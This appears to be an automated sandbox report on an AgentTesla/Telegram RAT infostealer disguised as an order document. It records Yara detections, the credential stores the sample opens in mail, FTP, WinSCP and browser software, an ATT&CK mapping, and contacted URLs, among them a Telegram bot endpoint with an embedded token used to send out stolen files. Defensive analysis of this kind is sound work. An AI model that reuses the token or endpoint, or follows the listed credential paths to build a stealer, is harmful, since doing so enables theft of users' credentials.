Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Queries volume information: C:\Users\user\AppData\Roaming\WsdnBq.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Queries volume information: C:\Users\user\AppData\Roaming\WsdnBq.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Telegram RAT

Source: Yara match	File source: Process Memory Space: ORDER (6256 OS)#391 PI.exe PID: 1948, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WsdnBq.exe PID: 1328, type: MEMORYSTR

Yara detected AgentTesla

Source: Yara match	File source: 00000004.00000002.565934222.0000000002C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.566251641.00000000032BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ORDER (6256 OS)#391 PI.exe PID: 1948, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WsdnBq.exe PID: 1328, type: MEMORYSTR

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions			Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions			Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Roaming\WsdnBq.exe

File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini			Jump to behavior

Source: Yara match	File source: Process Memory Space: ORDER (6256 OS)#391 PI.exe PID: 1948, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WsdnBq.exe PID: 1328, type: MEMORYSTR

Remote Access Functionality

Yara detected Telegram RAT

Source: Yara match	File source: Process Memory Space: ORDER (6256 OS)#391 PI.exe PID: 1948, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WsdnBq.exe PID: 1328, type: MEMORYSTR

Yara detected AgentTesla

Source: Yara match	File source: 00000004.00000002.565934222.0000000002C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.566251641.00000000032BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ORDER (6256 OS)#391 PI.exe PID: 1948, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WsdnBq.exe PID: 1328, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	211 Windows Management Instrumentation	1 Scheduled Task/Job	111 Process Injection	1 Disable or Modify Tools	2 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	Exfiltration Over Other Network Medium	1 Web Service	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Scheduled Task/Job	1 Deobfuscate/Decode Files or Information	21 Input Capture	114 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	Exfiltration Over Bluetooth	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	1 Credentials in Registry	311 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	Automated Exfiltration	11 Encrypted Channel	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	2 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	21 Input Capture	Scheduled Transfer	3 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	131 Virtualization/Sandbox Evasion	SSH	1 Clipboard Data	Data Transfer Size Limits	14 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	131 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	111 Process Injection	DCSync	1 Remote System Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 System Network Configuration Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
ORDER (6256 OS)#391 PI.exe	31%	ReversingLabs	ByteCode-MSIL.Trojan.Taskun
ORDER (6256 OS)#391 PI.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\WsdnBq.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\WsdnBq.exe	31%	ReversingLabs	ByteCode-MSIL.Trojan.Taskun

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
4.0.ORDER (6256 OS)#391 PI.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1203035		Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.fontbureau.comT.TTF	0%	URL Reputation	safe
http://www.fontbureau.comiona	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/9	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
https://api.telegram.org4	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/0	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/.	0%	URL Reputation	safe
http://DynDns.comDynDNSnamejidpasswordPsi/Psi	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/Y0	0%	URL Reputation	safe
http://www.fontbureau.com9	0%	URL Reputation	safe
http://www.ascendercorp.com/typedesigners.html	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.fontbureau.comR.TTF	0%	URL Reputation	safe
http://www.galapagosdesign.com/	0%	URL Reputation	safe
http://www.fontbureau.comF	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/T	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/K	0%	URL Reputation	safe
http://www.fontbureau.comto	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/oie.	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/jp/	0%	URL Reputation	safe
http://www.fontbureau.comFQO	0%	Avira URL Cloud	safe
http://www.fontbureau.comd	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.fontbureau.comedFB	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/Y0-eo	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.fontbureau.como	0%	URL Reputation	safe
http://www.fontbureau.comals	0%	URL Reputation	safe
http://www.fontbureau.comttod	0%	Avira URL Cloud	safe
http://www.fontbureau.comd.	0%	Avira URL Cloud	safe
http://www.fontbureau.comessedK	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/QO	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/hu-h	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/staff/dennis.htmY	0%	Avira URL Cloud	safe
https://VEVgTqSNHWikc.orgD	0%	Avira URL Cloud	safe
http://www.carterandcone.comigXje	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/Y0m	0%	Avira URL Cloud	safe
http://www.fontbureau.comalsq	0%	Avira URL Cloud	safe
http://www.fontbureau.comsivFf	0%	Avira URL Cloud	safe
http://www.fontbureau.comK	0%	Avira URL Cloud	safe
http://www.fontbureau.comonyT	0%	Avira URL Cloud	safe
http://www.fontbureau.comF.	0%	Avira URL Cloud	safe
http://www.fontbureau.come.comQO	0%	Avira URL Cloud	safe
http://www.fontbureau.comtalik	0%	Avira URL Cloud	safe
http://www.fontbureau.comW.TTF0	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/FL	0%	Avira URL Cloud	safe
http://www.fontbureau.comtop/	0%	Avira URL Cloud	safe
http://www.fontbureau.commB	0%	Avira URL Cloud	safe
https://VEVgTqSNHWikc.org	0%	Avira URL Cloud	safe
https://api.ipify.orgMozilla/5.0	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
api.ipify.org.herokudns.com	3.232.242.170	true	false	unknown
api.telegram.org	149.154.167.220	true	false	high
api.ipify.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot5962712783:AAFVWYP7zptQlynX_9COtuxYcx3Dl7EnfUQ/sendDocument	false		high
https://api.ipify.org/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.fontbureau.com/designersG	ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/?	ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/bThe	ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org	ORDER (6256 OS)#391 PI.exe, 00000004.00000002.567037453.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, WsdnBq.exe, 00000008.00000002.566476117.00000000032DE000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.comFQO	ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306418196.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306179537.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306112026.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305947057.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305872051.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305902033.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306146868.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306356978.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306084469.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306295180.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers?	ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.jiyu-kobo.co.jp/hu-h	ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302586272.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302546639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302387437.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302439715.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/oie.	ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302586272.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302546639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot5962712783:AAFVWYP7zptQlynX_9COtuxYcx3Dl7EnfUQ/1644584536appdatamacDpmac	WsdnBq.exe, 00000008.00000002.565696055.0000000003271000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.comttod	ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306418196.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306179537.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305459409.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306112026.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305947057.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305334059.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305363596.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305872051.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306630165.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305405967.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305302404.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305688249.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305902033.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305793816.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306146868.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306356978.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306084469.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305838697.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306295180.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305649023.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306583635.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiro.com	ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301411124.0000000005F0A000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301391011.0000000005F09000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers	ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.goodfont.co.kr	ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.comd.	ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304733777.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304498697.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304711949.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304659358.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304523813.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305041614.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304757622.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304920069.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304553639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304474473.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304869319.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304627606.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304797825.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304682884.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/QO	ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302586272.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.comT.TTF	ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304733777.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305041614.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304757622.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304920069.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304869319.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304797825.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.comiona	ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309947315.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309780990.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309765831.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.311674086.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349633653.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.313163883.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309806910.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312483314.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.313647928.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312816194.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.314195867.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312692455.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.313408101.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312978255.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.311643593.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.314379195.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.310304190.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.311583708.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312951679.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sajatypeworks.com	ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
